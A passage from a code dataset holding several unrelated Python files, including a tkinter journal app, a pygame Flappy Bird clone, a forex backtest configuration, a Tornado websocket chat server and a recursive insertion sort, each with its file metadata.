self.win.destroy()\r\n self.date_obj.addToFilterDict(self.journal_obj.getTags(self.date_obj.getDateProgramFormat()))\r\n self.date_obj.addToDateRegistry(self.date_obj.getDateProgramFormat())\r\n self.date_obj.addToCombobox(self.date_obj.getDateUserFormat())\r\n def NewLink(self):\r\n if self.date_obj.get():\r\n self.checkSaved()\r\n self.entry_obj.update(None, None, self.date_obj.getDateProgramFormat())\r\n self.date_obj.clear()\r\n else:\r\n messagebox.showinfo(\"Link Entry\", \"There is no entry to link from.\")\r\n def NewEntry(self):\r\n self.checkSaved()\r\n self.date_obj.clear()\r\n self.entry_obj.update()\r\n def DisplayLinks(self):\r\n self.journal_obj.getGraph()\r\n def Delete(self):\r\n selection = messagebox.askyesno(\"Delete Entry\", \"Delete this entry?\")\r\n if selection:\r\n self.entry_obj.update()\r\n self.date_obj.removeFromFilterDict(self.journal_obj.getTags(self.date_obj.getDateProgramFormat()))\r\n self.date_obj.removeFromDateRegistry(self.date_obj.getDateProgramFormat())\r\n self.date_obj.removeFromCombobox(self.date_obj.getDateUserFormat())\r\n self.journal_obj.delete(self.date_obj.getDateProgramFormat())\r\n self.date_obj.clear()\r\n def Quit(self):\r\n self.main_win.Destroy()\r\n \r\n \r\n def checkSaved(self):\r\n if self.entry_obj.getBodyBoxContents().strip():\r\n try:\r\n parent = 0 \r\n if self.entry_obj.getParentBoxContents():\r\n parent = self.entry_obj.getParentBoxContents()\r\n else:\r\n parent = None\r\n d = self.date_obj.getDateProgramFormat()\r\n if self.entry_obj.getBodyBoxContents().strip() != self.journal_obj.getBody(d).strip() \\\r\n or self.entry_obj.getTagsBoxContents().strip().split(', ') != sorted(self.journal_obj.getTags(d))\\\r\n or parent != self.journal_obj.getParent(d):\r\n self.throwSaveWarning()\r\n except KeyError:\r\n self.throwSaveWarning()\r\n \r\n def throwSaveWarning(self):\r\n selection = messagebox.askyesno(\"Save Entry\", \"Save before continuing?\")\r\n if selection:\r\n self.Save()\r\n \r\n def CreateOptionsFrame(self):\r\n return self.main\r\n \r\nclass DateFrame():\r\n def __init__(self, master, journal, entry):\r\n self.main = Frame(master)\r\n self.master = master\r\n self.journal_obj = journal\r\n self.entry_obj = entry\r\n \r\n self.date_userformat = \"\"\r\n self.date_programformat = 0\r\n \r\n self.registry = {}\r\n self.MONTHS = {\"01\":\"Jan\", \"02\":\"Feb\", \"03\":\"Mar\", \"04\":\"Apr\", \"05\":\"May\", \"06\":\"Jun\", \"07\":\"Jul\", \"08\":\"Aug\", \"09\":\"Sep\", \"10\":\"Oct\", \"11\":\"Nov\", \"12\":\"Dec\"}\r\n self.UpdateDateRegistry()\r\n \r\n self.date = Combobox(self.main, postcommand=self.updateCombobox)\r\n self.date.bind(\"<>\", self.Update)\r\n self.date.grid(row=0, column=8, columnspan=10)\r\n self.combo_list = []\r\n for key in sorted(self.registry):\r\n self.combo_list.append(self.registry[key])\r\n \r\n FILTER = Button(self.main, text=\"Filter\", command=self.showFilters).grid(row=0, column=18)\r\n self.filter_dict = dict()\r\n for key in self.journal_obj.getDictKeys():\r\n for tag in self.journal_obj.getTags(key):\r\n if tag not in self.filter_dict:\r\n self.filter_dict[tag] = 1\r\n elif tag in self.filter_dict:\r\n self.filter_dict[tag] += 1\r\n self.filter_tracker = []\r\n for item in sorted(list(self.filter_dict.keys())):\r\n self.filter_tracker.append([item, BooleanVar(value=True, name=item), None])\r\n self.search_type = StringVar(name=\"Search Type\", value=\"OR\")\r\n self.filter_window = ''\r\n \r\n def Update(self, event):\r\n self.date_userformat = self.date.get()\r\n self.date_programformat = list(self.registry.keys())[list(self.registry.values()).index(self.date_userformat)]\r\n body = self.journal_obj.getBody(self.date_programformat)\r\n tags = self.journal_obj.getTags(self.date_programformat)\r\n parent = self.journal_obj.getParent(self.date_programformat)\r\n self.entry_obj.update(body, tags, parent)\r\n def getDateUserFormat(self):\r\n return self.date_userformat\r\n def getDateProgramFormat(self):\r\n return self.date_programformat\r\n def getCurrentDate(self): #Program format\r\n date=datetime.today()\r\n return int(datetime.strftime(date, '%Y%m%d%H%M%S'))\r\n def get(self):\r\n return self.date.get()\r\n def ConvertToUserFormat(self, date):\r\n if date != '':\r\n datestr = ''\r\n datestr = date[6:8] + ' ' + self.MONTHS[date[4:6]] + ' ' + date[:4] + ', ' + date[8:]\r\n return datestr\r\n \r\n \r\n def UpdateDateRegistry(self):\r\n self.registry = {}\r\n for item in self.journal_obj.getDictKeys():\r\n self.registry[item] = self.ConvertToUserFormat(str(item))\r\n def addToDateRegistry(self, key):\r\n self.registry[key] = self.ConvertToUserFormat(str(key))\r\n def removeFromDateRegistry(self, key):\r\n del self.registry[key]\r\n \r\n \r\n def updateCombobox(self):\r\n self.clear()\r\n self.implementFilters()\r\n self.date['values'] = self.combo_list\r\n def addToCombobox(self, value):\r\n if value not in self.combo_list:\r\n self.combo_list.append(value)\r\n def removeFromCombobox(self, value):\r\n if value in self.combo_list:\r\n self.combo_list.remove(value)\r\n def updateDateDisplay(self):\r\n self.date_programformat = self.getCurrentDate()\r\n self.date_userformat = self.ConvertToUserFormat(str(self.date_programformat))\r\n self.date.set(self.date_userformat)\r\n def clear(self):\r\n self.date.set('')\r\n self.date_programformat = 0\r\n self.date_userformat = ''\r\n \r\n \r\n def addToFilterDict(self, tags):\r\n for tag in tags:\r\n if tag not in self.filter_dict:\r\n self.filter_dict[tag] = 1\r\n elif tag in self.filter_dict:\r\n self.filter_dict[tag] += 1\r\n def removeFromFilterDict(self, tags):\r\n for tag in tags:\r\n if self.filter_dict[tag] != 0:\r\n self.filter_dict[tag] -= 1\r\n def getFilterDict(self):\r\n return self.filter_dict\r\n def getFilterTracker(self):\r\n return self.filter_tracker\r\n def getFilterSearchVar(self):\r\n return self.search_type\r\n def setFilterSearchType(self, string):\r\n self.search_type.set(string)\r\n def showFilters(self):\r\n win = self.createFilterDialog() \r\n def implementFilters(self):\r\n filtered_tags = []\r\n if self.search_type.get() == 'AND':\r\n self.combo_list = []\r\n for key in sorted(self.registry):\r\n self.combo_list.append(self.registry[key])\r\n for item in self.filter_tracker:\r\n if item[1].get() == False:\r\n filtered_tags.append(item[0])\r\n for key in sorted(self.journal_obj.getDictKeys()):\r\n for tag in self.journal_obj.getTags(key):\r\n if tag in filtered_tags:\r\n self.removeFromCombobox(self.ConvertToUserFormat(str(key)))\r\n elif self.search_type.get() == 'OR':\r\n self.combo_list = []\r\n for item in self.filter_tracker:\r\n if item[1].get() == True:\r\n filtered_tags.append(item[0]) \r\n for key in sorted(self.journal_obj.getDictKeys()):\r\n for tag in self.journal_obj.getTags(key):\r\n if tag in filtered_tags:\r\n self.addToCombobox(self.ConvertToUserFormat(str(key)))\r\n \r\n \r\n def createFilterDialog(self):\r\n main = Toplevel()\r\n top = Frame(main)\r\n middle = Frame(main)\r\n bottom = Frame(main)\r\n \r\n scrollbar = Scrollbar(middle)\r\n cb_canvas = Canvas(middle, highlightthickness=0)\r\n main.title(\"Filters\")\r\n filter_list = self.getFilterTracker().copy()\r\n for item in filter_list:\r\n item[2] = (Checkbutton(cb_canvas, text=item[0], onvalue=True, offvalue=False, variable=item[1]))\r\n ANDTYPE = Radiobutton(top, text=\"AND\", value=\"AND\", variable=self.getFilterSearchVar())\r\n ANDTYPE.grid(row=0, column=0, sticky=W)\r\n ORTYPE = Radiobutton(top, text=\"OR\", value=\"OR\", variable=self.getFilterSearchVar())\r\n ORTYPE.grid(row=0, column=1, sticky=W)\r\n item = 0\r\n row = 10\r\n col = 0\r\n while item < len(filter_list):\r\n for i in range(0, row):\r\n try:\r\n filter_list[item][2].grid(row=i, column=col, sticky=W)\r\n item+=1\r\n except IndexError:\r\n break\r\n col+=1\r\n cb_canvas.grid(row=1, column=0, rowspan=10, columnspan=2)\r\n ALL = Button(bottom, text=\"All\", command=lambda:self.selectAllCheckboxes(filter_list))\r\n NONE = Button(bottom, text=\"None\", command=lambda:self.deselectAllCheckboxes(filter_list))\r\n ALL.grid(row=2, column=0, sticky=W)\r\n NONE.grid(row=2, column=1, sticky=E)\r\n top.pack(side=TOP)\r\n middle.pack(side=TOP)\r\n bottom.pack(side=TOP)\r\n main.grab_set()\r\n return main\r\n \r\n def selectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(True)\r\n def deselectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(False)\r\n \r\n def CreateDateFrame(self):\r\n return self.main\r\n \r\nclass Dialog:\r\n def __init__(self, parent=None):\r\n self.parent_obj = parent\r\n \r\n def throwSaveWarning(self):\r\n main = Toplevel()\r\n main.title(\"Warning!\")\r\n message = Message(main, text=\"Save before continuing?\", anchor=CENTER).grid(row=0, column=1)\r\n SAVE = Button(main, text=\"Save\", command=self.parent_obj.Save)\r\n SAVE.grid(row=1, column=0, columnspan=2)\r\n DONTSAVE = Button(main, text=\"Don't Save\", command=main.destroy)\r\n DONTSAVE.grid(row=1, column=2, columnspan=2)\r\n return main \r\n def throwDeleteWarning(self):\r\n main = Toplevel()\r\n main.title(\"Warning\")\r\n message = Message(main, text=\"Are you sure you want to delete this entry?\").grid(row=0, column=1, columnspan=2, sticky=EW)\r\n DELETE = Button(main, text=\"Yes\", command=self.parent_obj.Delete).grid(row=1, column=0, columnspan=2, sticky=E)\r\n DONTDELETE = Button(main, text=\"No\", command=main.destroy).grid(row=1, column=2, columnspan=2, sticky=W)\r\n return main\r\n def createFilterDialog(self):\r\n main = Toplevel()\r\n top = Frame(main)\r\n middle = Frame(main)\r\n bottom = Frame(main)\r\n \r\n scrollbar = Scrollbar(middle)\r\n cb_canvas = Canvas(middle)\r\n main.title(\"Filters\")\r\n filter_list = self.parent_obj.getFilterTracker().copy()\r\n for item in filter_list:\r\n item[2] = (Checkbutton(cb_canvas, text=item[0], onvalue=True, offvalue=False, variable=item[1]))\r\n ANDTYPE = Radiobutton(top, text=\"AND\", value=\"AND\", variable=self.parent_obj.getFilterSearchVar())\r\n ANDTYPE.grid(row=0, column=0, sticky=W)\r\n ORTYPE = Radiobutton(top, text=\"OR\", value=\"OR\", variable=self.parent_obj.getFilterSearchVar())\r\n ORTYPE.grid(row=0, column=1, sticky=W)\r\n item = 0\r\n row = 10\r\n col = 0\r\n while item < len(filter_list):\r\n for i in range(0, row):\r\n try:\r\n filter_list[item][2].grid(row=i, column=col, sticky=W)\r\n item+=1\r\n except IndexError:\r\n break\r\n col+=1\r\n cb_canvas.grid(row=1, column=0, rowspan=10, columnspan=2)\r\n ALL = Button(bottom, text=\"All\", command=lambda:self.selectAllCheckboxes(filter_list))\r\n NONE = Button(bottom, text=\"None\", command=lambda:self.deselectAllCheckboxes(filter_list))\r\n ALL.grid(row=2, column=0, sticky=W)\r\n NONE.grid(row=2, column=1, sticky=E)\r\n top.pack(side=TOP)\r\n middle.pack(side=TOP)\r\n bottom.pack(side=TOP)\r\n return main\r\n \r\n def selectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(True)\r\n def deselectAllCheckboxes(self, filter_list):\r\n for i in range(0, len(filter_list)):\r\n filter_list[i][1].set(False)\r\n \r\n ","sub_path":"JournalWidgets.py","file_name":"JournalWidgets.py","file_ext":"py","file_size_in_byte":16855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46769740","text":"# CS320 Programming Language\n# Author: Joe Do & Stuart Larsen\n# Date: Feb 26, 2018\n# The purpose of this program is to create a clone of the Flappy Bird game\n\nimport pygame\nimport random\nimport time\n\n# initiate pygame module\npygame.init()\n\n# set text color\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\n\n# set width and height for the game\ndisplay_width = 288\ndisplay_height = 512\nbird_height = 24\nbase_height = 112\npipe_height = 320\n\ngameDisplay = pygame.display.set_mode((display_width, display_height))\npygame.display.set_caption('Flappy Bird Clone')\nclock = pygame.time.Clock()\n\n# load all the graphics and sound here\nstartScreen = pygame.image.load('assets/images/message1.png')\nbirdImage = pygame.image.load('assets/images/redbird-upflap.png')\npipeImage = pygame.image.load('assets/images/pipe-red.png')\nbg = pygame.image.load('assets/images/background-night.png')\nbase = pygame.image.load('assets/images/base.png')\ngameover = pygame.image.load('assets/images/gameover.png')\nsoundWing = pygame.mixer.Sound('assets/audio/wing.wav')\nsoundHit = pygame.mixer.Sound('assets/audio/hit.wav')\nsoundDie = pygame.mixer.Sound('assets/audio/die.ogg')\nsoundPoint = pygame.mixer.Sound('assets/audio/point.ogg')\nsoundWin = pygame.mixer.Sound('assets/audio/point.wav')\n\n# Flip the pipe over\npipeInvert = pygame.transform.rotate(pipeImage,180)\n\n# bird function to display the bird\ndef bird(x, y):\n gameDisplay.blit(birdImage, (x, y)) # blit bird image in x and y coordinates\n\n# move base accorss the screen\ndef base_move(baseStartX):\n baseEndX = baseStartX % base.get_rect().width\n gameDisplay.blit(base,(baseEndX - base.get_rect().width, display_height - 112))\n if baseEndX < display_width:\n gameDisplay.blit(base, (baseEndX, display_height - 112))\n\n# this function will print out score\ndef passedPipe(count):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Score: \" + str(count), True, white)\n gameDisplay.blit(text, (0, 0))\n\n# Display the bottom pipe\ndef bottomPipe(xCoordinate, yCoordinate):\n gameDisplay.blit(pipeImage, (xCoordinate, yCoordinate))\n\n# Display the top pipe\ndef topPipe(xCoordinate, yCoordinate):\n gameDisplay.blit(pipeInvert, (xCoordinate, yCoordinate))\n\n# Keep the game going after bird crashed\ndef crash():\n game_loop()\n\n# display start screen at start of game, and when player loses\ndef game_intro():\n startInitialized = False\n while not startInitialized:\n gameDisplay.blit(bg, (0, 0))\n gameDisplay.blit(startScreen,(55,80))\n gameDisplay.blit(base,(0, display_height - 112))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_b:\n startInitialized = True\n\n# this is the main game loop\ndef game_loop():\n birdX = display_width / 3\n birdY = (display_height - base_height) / 2\n birdMove = 0\n pipeStartX = display_width + 100\n pipeBottomY = 250\n pipeTopY = -170\n pipe_speed = 4\n passed = 0\n baseStartX = 0\n\n game_intro()\n\n # when crashed is true, quit the game\n gameExit = False\n while not gameExit:\n for event in pygame.event.get(): # event-handling's loop\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN: # this event happens when a key is pressed\n if event.key == pygame.K_SPACE: # press spacebar to jump\n soundWing.play()\n birdMove = -4\n\n if event.type == pygame.KEYUP: # this event happens when a key is released\n if event.key == pygame.K_SPACE:\n birdMove = 2\n\n birdY += birdMove\n gameDisplay.blit(bg, (0, 0)) # draw background\n\n # draw top pipe\n bottomPipe(pipeStartX, pipeBottomY)\n\n #calls baseMove to display the base image\n base_move(baseStartX)\n #updates base image x to make it look like it's moving\n baseStartX -= 2\n\n bird(birdX, birdY) # draw bird\n\n # draw the bottom pipe\n topPipe(pipeStartX, pipeTopY)\n\n pipeStartX -= pipe_speed # make the pipe move left four pixel at a time\n\n # update score when bird passed a pipe\n if birdX == pipeStartX + 52:\n soundWin.play()\n passed += 1\n\n passedPipe(passed)\n\n # When bird hit base, pipe or top of screen, it will crash\n if birdY > display_height - bird_height - base_height:\n soundDie.play()\n time.sleep(2)\n crash()\n\n # bird crashes when it hits any pipe\n if birdX + 25 > pipeStartX and birdX - 50 < pipeStartX:\n if birdX + 25 > pipeStartX and (birdY < pipeTopY + pipe_height or birdY + 24 > pipeBottomY):\n soundHit.play()\n time.sleep(2)\n crash()\n\n # moving pipes accross the screen\n if pipeStartX < -50:\n pipeStartX = display_width\n\n # make pipes change y coordinate randomly\n pipeTopY = random.randint(-200, -40)\n pipeBottomY = pipe_height + 100 + pipeTopY\n\n pygame.display.update()\n clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"95965525","text":"#! /usr/local/bin/python3\n# coding=utf-8\n\"\"\"A utility module for beaunus_clip_splicer.\n\"\"\"\n\nTRACK_INDEX = None\n\n\ndef make_generic_dict(args):\n \"\"\"Given a list of arguments, returns a dictionary with each\n argument as a properties in the dictionary.\n\n Args:\n args: A list of arguments that will become properties in the\n dictionary.\n\n Returns:\n A dictionary containing all the data in the arguments.\n \"\"\"\n result = dict()\n for key in args:\n if args[key]:\n result[key] = args[key]\n return result\n\n\n# pylint: disable=unused-argument\ndef make_media_item(name=None, track=None, filename=None, length=None,\n mute=False):\n \"\"\"Returns a dictionary that represents a media item.\n\n Args:\n name: The name of the media item.\n track: The track that the media item should appear on.\n filename: The file that should be loaded into the media item.\n length: The length of the media item.\n mute: Whether or not to mute the media item.\n\n Returns:\n A dictionary that represents the media item.\n \"\"\"\n result = make_generic_dict(locals())\n result['type'] = 'MEDIA ITEM'\n return result\n\n\n# pylint: disable=unused-argument\ndef make_region(name=None, track=None, path=None, components=None):\n \"\"\"Returns a dictionary that represents a region.\n\n Args:\n name: The name of the region.\n track: The track that all children should appear on.\n path: The path that all children's files exist in.\n components: The components that should be loaded into the region.\n\n Returns:\n A dictionary that represents the region.\n \"\"\"\n result = make_generic_dict(locals())\n result['type'] = 'REGION'\n if not components:\n result['components'] = list()\n return result\n\n\n# pylint: disable=global-statement\ndef make_track(name, pre_track_pause_length=None):\n \"\"\"Returns a new track. If a pre_track_pause_length is specified,\n an empty track of that length is added to the track's component list.\n\n Args:\n name: The name of the track.\n\n Returns:\n A dictionary that represents a track.\n \"\"\"\n global TRACK_INDEX\n if TRACK_INDEX is None:\n TRACK_INDEX = 1\n\n track_name = 'Track ' + str(TRACK_INDEX).zfill(2) + ' - ' + name\n result = make_region(track_name)\n TRACK_INDEX += 1\n if pre_track_pause_length:\n result['components'].append(\n make_media_item(\n 'PAUSE at beginning of track',\n 'PAUSES',\n length=pre_track_pause_length))\n\n return result\n","sub_path":"Various/beaunus_clip_splicer/beaunus_clip_splicer_tools.py","file_name":"beaunus_clip_splicer_tools.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404901894","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n#############################################################\nSIMULATION CONFIGURATION FILE\n#############################################################\nThis file contains all the header informations necessary to \ninitialize a backtest. \n\nPlease, read carefully all the explanations and report any \nbugs found in this file. \n\"\"\"\n\n\"\"\" \n===============================================================================\nMODULE IMPORTATION STEP\n===============================================================================\nThis step is dedicated to specify the path at which the Q26 BackTester module \nis stored on your machine and to import the different important objects : \n - SYMBOL : This object correponds to the \"broker\" identity of \n the symbol to be backtested. \n - PORTFOLIO : This object corresponds to the portfolio to be \n simulated. \n - PRICE/PRICE_TABLE : These objects refers to the datasets. \n - SIMULATION : This object corresponds to the simulation algorithm \n itself.\n\"\"\"\n# Usual modules importations \nimport sys, os \nimport numpy as np \nimport pandas as pd \nimport datetime as dt \nimport matplotlib.pyplot as plt \nimport pprint\nimport copy \nfrom multiprocessing import Pool\n\n# Q26 BacktestSystem class importations \nfrom quanTest.symbol import SYMBOL\nfrom quanTest.portfolio import PORTFOLIO \nfrom quanTest.data import PRICE \nfrom quanTest.data import PRICE_TABLE\nfrom quanTest.simulation import SIMULATION\n\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : DATA PRICE PREPARATION\n===============================================================================\n\"\"\"\n\n# We define the path to the dataset\npath = \"./\"\npath += \"exampleDataFile.csv\"\n# We create an object PRICE and give it a name \nprice = PRICE(\"EUR.USD\") \n# We associate the name of the columns in the datafile with \n# the properties of the PRICE object.\n# In the specific case of the exampleDataFile.csv dataset, we do not have \n# any information of ask/bid price, so we consider by default that ask = bid \n# in the reading process. This will lead to a spread = 0.\nprice.setColumnsTitle(askOpen =\"open\", \n askHigh =\"high\",\n askLow =\"low\",\n askClose =\"close\", \n bidOpen =\"open\", \n bidHigh =\"high\",\n bidLow =\"low\",\n bidClose =\"close\",\n dateFormat =\"%Y.%m.%d %H:%M\", \n volume =\"vol\",\n splitDaysHours =True, \n days =\"date\", \n hours =\"hour\")\n# We read the data\nprice.read(path)\n# We define the timeframe associated to the loaded data \nprice.setBaseTimeframe(timeframe = dt.timedelta(minutes = 1))\n# We fill the missing data according to a data filling model \nprice.fillMissingData()\n\n\n# If necessary, we can shift our data \nprice.shiftMarketTime(timeshift = 0)\n# We can define the time zone in which data have been scraped (UTC+...)\nprice.dataTimeZone = 0\n# We can define the timezone in which the market is located (UTC+...)\nprice.marketTimeZone = 0\n# We can define market opening/closing hours in the format \"HH:MM\"\n# Note : If the market never close, the opening hour is \"00:00\"\n# while the closing hour is \"24:00\".\nprice.marketOpeningHour = \"00:00\"\nprice.marketClosingHour = \"24:00\"\n# If the market has a mid day break or others breaks during the day \n# write it in the format : \"HH:MM-HH:MM\"\nprice.marketLunch = None\nmarketBreakList = list()\n# Days of the week the market is open - 0 : Monday -> 6 : Sunday \nprice.daysOfWeek = [0, 1, 2, 3, 4]\n# Soon ... vacations \n# Function that define if the market is open/close \nprice.setMarketState() \n\n# From the price object, it is possible to define another exact same object \n# thanks to the deepcopy function\nprice_H1 = copy.deepcopy(price)\n# Here this dataset object is resampled to be used in the simulation. \n# The resampling process is exactly the same as you can see \n# on trading platforms. \nprice_H1.resampleData(\"01:00\", name = \"EUR.USD\")\n\n# We generate our data table which will be involved in the simulation \ntable = PRICE_TABLE([price, price_H1]) \n# In the case where we have more than 1 not resampled price, \n# the synchronize function will be necessary. \ntable.synchronize()\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : SYMBOL PROPERTIES IN THE BROKER FRAME\n===============================================================================\nNote : Fees are not yet implemented \n\"\"\"\n\nsymbol = SYMBOL(symbolName = \"EUR.USD\",\n contractSize = 100000, \n marginCurrency = \"USD\", # Can be any existing currency (only USD is working for instance)\n profitCalculationMethod = \"Forex\", # \"CFD\", \"Forex\", \"Stock\", \"CFD-Index\"\n marginRequestMethod = \"Forex\", # \"CFD\", \"Forex\", \"Stock\", \"CFD-Index\"\n marginPercentage = 100, \n execution = \"Market\", \n minimalVolume = 0.01, \n maximalVolume = 100.0, \n volumeStep = 0.01, \n precision = 5, # Price precision (3 means 1 point = 0.001)\n exchangeType = \"Point\", # \"Point\", \"Percentage\"\n exchangeLong = 6.88, \n exchangeShort = 0.63)\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : PORTFOLIO PROPERTIES\n===============================================================================\n\"\"\"\n\n# We initialize our portfolio \np = PORTFOLIO(initialDeposit = 100000, # The initial client deposit \n leverage = 30, # The leverage value (margin = initialDeposit*leverage)\n currency = \"USD\", # The currency \n positions = \"long & short\", # \"long\", \"short\" or \"long & short\"\n marginCallTreeshold = 100, # If marginLevel < marginCallTreeshold : Warning (no more trading allowed)\n marginMinimum = 50, # If marginLevel < marginMinimum : Automatically close all losing positions \n minimumBalance = 50000, # If balance < minimumBalance : No more trading allowed \n maximumProfit = 100000, # If balance - inialDeposit > maximumProfit : No more trading allowed \n maximumDrawDown = 70, # If drawDown < maximumDrawDown : No more trading allowed \n maximumConsecutiveLoss = 50000, # If valueLossSerie > maximumConsecutiveLoss : No more trading allowed \n maximumConsecutiveGain = 50000, # If valueGainSerie > maximumConsecutiveGain : No more trading allowed \n maximumNumberOfConsecutiveGains = 30)\n\n# We add the symbol identity we created inside the portfolio object \np.addSymbol(symbol)\n\n\"\"\" \n===============================================================================\nSIMULATION PREPARATION STEP\n===============================================================================\nNote that in this step, we prepare the same number of strategies and initial \nportfolio. A strategy and a portfolio interacting together have the same index \nin the list. \n\"\"\"\nN = 10 # Number of strategies \n\nstratPath = \"./\"\nstratFile = \"strategyExample\"\n\nstratPathList = list() \nstratFileList = list() \nportfolioList = list() \n\n\nfor i in range(N) : \n stratPathList.append(stratPath) \n stratFileList.append(stratFile)\n portfolioList.append(copy.deepcopy(p))\n \n \n\n\n\n# We initialize the simulation object \nsim = SIMULATION(portfolioList, table)\n\nsim.subLoopModel = \"close only\"\nsim.maxHstDataSize = 2000\nsim.startIndex = 2000\n# sim.stopIndex = 5000\nsim.logEvery = 1000\n\n\n# Relative or absolute pathe to the strategy file\n# and strategy class importation \nsim.strategyPath = stratPathList\nsim.strategyFile = stratFileList\nsim.importStrategy()\n\n\"\"\" \n===============================================================================\nMONTE CARLO STEP\n===============================================================================\nIn this step, we use a random uniform distribution of moving average period.\n\"\"\"\nnp.random.seed(1)\nfor i in range(N) : \n sim.strategy[i].SMA1_period = int(np.random.uniform(5, 15))\n sim.strategy[i].SMA2_period = int(np.random.uniform(15, 30))\n sim.strategy[i].showInfo = False \n\n\n\"\"\" \n===============================================================================\nSIMULATION STEP\n===============================================================================\n\"\"\"\n\n# Check of the simulation parameters (not yet working)\nsim.parametersCheck()\n\n\n\n\n\n\n\"\"\" \n===============================================================================\nSIMULATION RUN IN PARALLEL MODE\n!!! Do not run this in an IDE, only through a terminal !!! \n===============================================================================\nThe \"unique\" mode means that an index selected couple strategy-portfolio is \nexecuted only. \n\"\"\" \n\n# For every simulation we only run a unique simulation defined \n# by the index of the couple strategy-portfolio and we return \n# the portfolio object\ndef simulate(index) : \n sim.run(mode = \"unique\", idx = index)\n return sim.portfolio[index] \n\n\ndef main() : \n p = Pool(processes=8)\n tasks = [(i) for i in range(N)]\n simulations = p.map_async(simulate, tasks)\n \n p.close()\n p.join()\n \n # All the modified portfolio are merged \n # together and the list of portfolio is updated \n # in the SIMULATION object \n portfolioList = list()\n for i in range(len(simulations._value)) : \n portfolioList.append(simulations._value[i])\n \n sim.portfolio = portfolioList\n\n \nif __name__ == \"__main__\" : \n main()\n fig, ax = sim.showEquityCurve(index = list(np.linspace(0, N-1, num = N-1, dtype = int)), xTime = True)\n\n\"\"\" \n===============================================================================\nSIMULATION RUN IN SEQUENTIAL MODE\n===============================================================================\nSequential mode means that each couple of strategy-portfolio is executed before \ngoing to the next time step.\n\"\"\" \n\n# # Run of the simulation \n# sim.run(mode = \"sequential\")\n# # We plot the equity curve \n# fig, ax = sim.showEquityCurve(index = list(np.linspace(0, N-1, num = N-1, dtype = int)), xTime = True)\n\n\n\n\n\n","sub_path":"examples/simulationExample_MonteCarlo.py","file_name":"simulationExample_MonteCarlo.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415092578","text":"import imp\nimport os\nimport sys\n\nmodule_name = 'haloevents'\nhere_dir = os.path.dirname(os.path.abspath(__file__))\nmodule_path = os.path.join(here_dir, '../../')\nsys.path.append(module_path)\nfp, pathname, description = imp.find_module(module_name)\nhaloevents = imp.load_module(module_name, fp, pathname, description)\n\n\nclass TestUnitHaloEvents:\n def test_unit_haloevents_instantiate(self):\n assert haloevents.HaloEvents(\"\", \"\")\n","sub_path":"tests/unit/test_unit_haloevents.py","file_name":"test_unit_haloevents.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"194100515","text":"import json\nimport os\n\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\nfrom tornado.web import url\n\ndefine('port', default=8888, help='run on the given port', type=int)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html')\n\n\nclass ChatHandler(tornado.websocket.WebSocketHandler):\n waiters = set()\n messages = []\n\n def open(self, *args, **kwargs):\n self.waiters.add(self)\n self.write_message({'messages': self.messages})\n\n def on_message(self, message):\n message = json.loads(message)\n self.messages.append(message)\n for waiter in self.waiters:\n if waiter == self:\n continue\n waiter.write_message({'message': message['message']})\n\n def on_close(self):\n self.waiters.remove(self)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n url(r'/', IndexHandler, name='index'),\n url(r'/chat', ChatHandler, name='chat'),\n ]\n settings = dict(\n template_path=os.path.join(os.path.dirname(__file__), 'templates'),\n static_path=os.path.join(os.path.dirname(__file__), 'static'),\n debug=True,\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n\n\nif __name__ == '__main__':\n app = Application()\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"chat/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"367514602","text":"import sys\r\n\r\ndef insertion_sort(a,n):\r\n\t# Base case: if array size is 1, then return\r\n\tif n==1:\r\n\t\treturn\r\n\t# recursively sort all except the last element\r\n\tinsertion_sort(a,n-1)\r\n\t# insert the last element in its correct position in the sorted array\r\n\tlast=a[n-1]\r\n\ti=n-2\r\n\twhile i>=0 and a[i]>last:\r\n\t\ta[i+1]=a[i]\r\n\t\ti-=1\r\n\ta[i+1]=last\r\n\r\n\r\na=[int(i) for i in input().split()]\r\ninsertion_sort(a,len(a))\r\nprint(\"Sorted Array: \")\r\nfor i in a:\r\n sys.stdout.write(\"{} \".format(i))\r\n \r\n","sub_path":"insertion_sort_recursive.py","file_name":"insertion_sort_recursive.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594330093","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom pygsp import graphs, filters, plotting, utils\nfrom pygsp.graphs import 